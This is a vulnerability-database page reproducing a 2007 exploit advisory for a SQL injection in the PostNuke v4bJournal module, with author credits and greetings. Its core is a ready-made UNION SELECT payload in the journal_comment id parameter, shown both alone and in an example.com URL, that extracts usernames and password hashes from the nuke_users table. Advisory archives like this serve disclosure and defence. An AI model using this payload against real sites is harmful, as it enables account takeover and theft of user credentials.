Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16925
HistoryMay 03, 2007 - 12:00 a.m.

Post Nuke v4bJournal Module Sql Inject

2007-05-0300:00:00
vulners.com
16
JSON

PostNuke Journal

                DISCOVERED BY :Ali Abbasi

Olom Fonon Mazandaran University - Security Research Center, Babol, Iran

Greetz For All Y! UnderGround Group Members ( www.2600.ir )

Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

     Contact:     [email protected]





                               {SQL BUG}

in

index.php?module=v4bJournal&func=journal_comment&id=(SQL)

     EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact: [email protected]

index.php?module=v4bJournal&func=journal_comment&id=-1//union//select//0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14//from//nuke_users//where/**/pn_uid=2/*

EX:-

http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

U must regrister first ( You Most Have An Account On Vulnerable Site )

JSON